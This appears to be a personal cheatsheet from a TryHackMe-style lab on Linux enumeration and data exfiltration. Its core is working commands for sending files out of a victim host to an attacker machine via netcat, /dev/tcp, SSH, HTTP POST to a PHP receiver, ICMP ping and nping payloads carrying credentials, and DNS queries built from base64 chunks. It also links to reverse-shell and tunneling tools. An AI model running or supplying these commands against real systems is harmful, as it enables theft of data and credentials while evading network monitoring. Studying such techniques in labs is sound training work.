Linux cheatsheet
Enum
OS
uname -a
cat /etc/os-release
users
who
whoami
last
w
netowrk
netstat
sudo netstat -atupn
ss
processes
Note: pspy64
ps -aux
Data transfer
Netcat style
On our machine
nc -l -p 1234 -q 1 > something.zip < /dev/null
On victim
cat something.zip | netcat server.ip.here 1234
Tcp
Send
On our machine
nc -lvp 8080 > /tmp/filename.data
On victim
tar zcf - task4/ | base64 | dd conv=ebcdic > /dev/tcp/192.168.0.133/8080
Extract
dd conv=ascii if=task4-creds.data |base64 -d > task4-creds.tar
tar xvf task4-creds.tar
SSH
Note: needs ssh enabled on our machine
On victim
tar cf - task5/ | ssh thm@jump.thm.com "cd /tmp/; tar xpf -"
Http(s)
Example php web server
<?php
if (isset($_POST['file'])) {
$file = fopen("/tmp/http.bs64","w");
fwrite($file, $_POST['file']);
fclose($file);
}
?>
Send file
curl --data "file=$(tar zcf - task6 | base64)" http://web.thm.com/contact.php
Parse file
## Fix base64 (due to url encoding on http protocol)
sudo sed -i 's/ /+/g' /tmp/http.bs64
## Extract
cat /tmp/http.bs64 | base64 -d | tar xvfz -
Tunneling
https://github.com/L-codes/Neo-reGeorg
ICMP
Traditional
Convert our data to hex
echo "thm:tryhackme" | xxd -p
Send via ping
ping 10.10.237.11 -c 1 -p 74686d3a7472796861636b6d650a
Via metasploit and nping
Setup listener:
use auxiliary/server/icmp_exfil
set BPF_FILTER icmp and not src <IP>
Send data:
sudo nping --icmp -c 1 ATTACKBOX_IP --data-string "BOFfile.txt"
sudo nping --icmp -c 1 ATTACKBOX_IP --data-string "admin:password"
sudo nping --icmp -c 1 ATTACKBOX_IP --data-string "admin2:password2"
sudo nping --icmp -c 1 ATTACKBOX_IP --data-string "EOF"
Reverse shell
https://github.com/krabelize/icmpdoor
DNS
Note: you need to own a domain and set nameservers to direct traffic to your server!
Setup listener
sudo tcpdump -i eth0 udp port 53 -v
Send file
cat task9/credit.txt |base64 | tr -d "\n" | fold -w18 | sed 's/.*/&./' | tr -d "\n" | sed s/$/att.tunnel.com/ | awk '{print "dig +short " $1}' | bash
Parse file
echo TmFtZTogVEhNLXVzZX.IKQWRkcmVzczogMTIz.NCBJbnRlcm5ldCwgVE.hNCkNyZWRpdCBDYXJk.OiAxMjM0LTEyMzQtMT.IzNC0xMjM0CkV4cGly.ZTogMDUvMDUvMjAyMg.pDb2RlOiAxMzM3Cg== | cut -d"." -f1-8 | tr -d "." |base64 -d